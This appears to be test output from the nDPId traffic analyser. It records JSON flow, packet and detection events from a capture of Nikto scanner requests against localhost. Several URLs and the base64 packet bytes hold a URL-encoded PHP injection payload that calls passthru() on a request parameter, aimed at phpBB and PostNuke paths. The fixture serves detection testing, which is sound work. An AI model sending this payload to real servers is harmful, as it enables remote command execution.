{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277752,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":1,"flow_last_seen":1576420277752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277752,"pkt":"AAAAAAAAAAAAAAAACABFAAFjNwZAAEAGBI1\/AAABfwAAAca4H5DKtQ4b91nN3YAYAED\/VwAAAQEICp1m\/yCdZv8gR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277752,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277753,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":1,"flow_last_seen":1576420277753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":364,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":364,"pkt_l4_len":330,"thread_ts_msec":1576420277753,"pkt":"AAAAAAAAAAAAAAAACABFAAFeFwdAAEAGJJF\/AAABfwAAAca6H5C+9y4cicj8j4AYAED\/UgAAAQEICp1m\/yGdZv8hR0VUIC9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277753,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":1,"flow_last_seen":1576420277754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277754,"pkt":"AAAAAAAAAAAAAAAACABFAAFnn4NAAEAGnAt\/AAABfwAAAca8H5BO76agHBQLN4AYAED\/WwAAAQEICp1m\/yKdZv8iR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="} 
+01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":1,"flow_last_seen":1576420277756,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277756,"pkt":"AAAAAAAAAAAAAAAACABFAAFsUT9AAEAG6kp\/AAABfwAAAca+H5B2qmgj3lZSb4AYAED\/YAAAAQEICp1m\/ySdZv8kR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":1,"flow_last_seen":1576420277758,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277758,"pkt":"AAAAAAAAAAAAAAAACABFAAFmwkJAAEAGeU1\/AAABfwAAAcbAH5DScvtgYIpbaYAYAED\/WgAAAQEICp1m\/yadZv8mR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCg0K"} 
+01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":1,"flow_last_seen":1576420277760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277760,"pkt":"AAAAAAAAAAAAAAAACABFAAFkSaBAAEAG8fF\/AAABfwAAAcbCH5CzknC\/qWQ1toAYAED\/WAAAAQEICp1m\/yidZv8oR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="} +01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277762,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":1,"flow_last_seen":1576420277762,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277762,"pkt":"AAAAAAAAAAAAAAAACABFAAFkl59AAEAGo\/J\/AAABfwAAAcbEH5DhFa6+6BKXhoAYAED\/WAAAAQEICp1m\/yqdZv8qR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="} 
+01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277762,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_packet_id":1,"flow_last_seen":1576420277764,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277764,"pkt":"AAAAAAAAAAAAAAAACABFAAFdzxpAAEAGbH5\/AAABfwAAAcbGH5DgufY6a2RlI4AYAED\/UQAAAQEICp1m\/yydZv8sR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCg0K"} +01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277766,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_packet_id":1,"flow_last_seen":1576420277766,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277766,"pkt":"AAAAAAAAAAAAAAAACABFAAFm3WVAAEAGXip\/AAABfwAAAcbIH5DcNuRDgHH2c4AYAED\/WgAAAQEICp1m\/y2dZv8tR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
